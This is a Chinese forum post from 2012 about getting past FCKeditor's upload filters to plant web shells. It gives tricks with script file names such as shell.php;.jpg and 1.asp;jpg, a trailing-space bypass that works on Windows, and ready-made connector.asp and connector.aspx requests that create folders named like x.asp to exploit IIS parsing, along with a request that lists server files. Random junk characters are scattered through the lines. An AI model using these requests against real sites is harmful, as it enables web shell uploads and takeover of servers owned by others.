很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg# ?: H: e" G& I: n$ W
+ |4 v; c" T0 L( ~) b/ c4 K提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。1 n' E' b; l( l+ Z
! Z- V( [4 M+ c3 }继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
x4 M3 o7 x9 b$ b( L5 A
* g7 M4 l }# r3 k+ ^! V7 k突破建立文件夹:' ]' q. M" I _8 k9 q r$ X
8 b9 K8 P1 Z l& ~2 Ieditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
4 R! v/ T% g( D1 y0 X
2 U( y$ F, G( j( u) I+ D2 w参数:
5 g. R2 A2 N: Y$ s0 {3 C
' A2 s$ ^4 u* _# X6 z; V+ F6 ^. d1 y当前目录名:CurrentFolder=/qing.asp( d% k# m8 V& Q% d. ?) j3 h
. O {# F4 t# L3 L; o, H q3 l; I新的目录名:NewFolderName=x.asp
1 h6 k! h" u+ J3 M/ f
. | H1 [+ S6 T其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……9 P1 u7 }( T, `9 ^) x( g$ H) |
E6 O0 k, }6 n那么 x.asp 就已经建立生成了,此方法百试百灵!
: k+ a5 Y" \ @" d' [; ^# C
( s0 G& b) \; Z! X- ]新建文件夹参数 x.asp,基本都能搞定。
3 ]' ^' Z& m- K J0 z. Z1 n+ c- e/ d. r# w0 ]
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
4 @% j5 F" N2 l) e+ R) B \2 h; D6 l4 g; T
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp. A9 c3 c/ |, n* E
. q0 p: e4 @8 e( G+ W( E2 A
获取文件列表6 H) ]1 j: r; P1 D6 z' y- B/ Y
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
% m7 t% L* e! G) ~5 J) J: s) R e/ k5 Z6 J8 Y- o
|
发表于 2012-12-31 09:27:09
收藏
支持
反对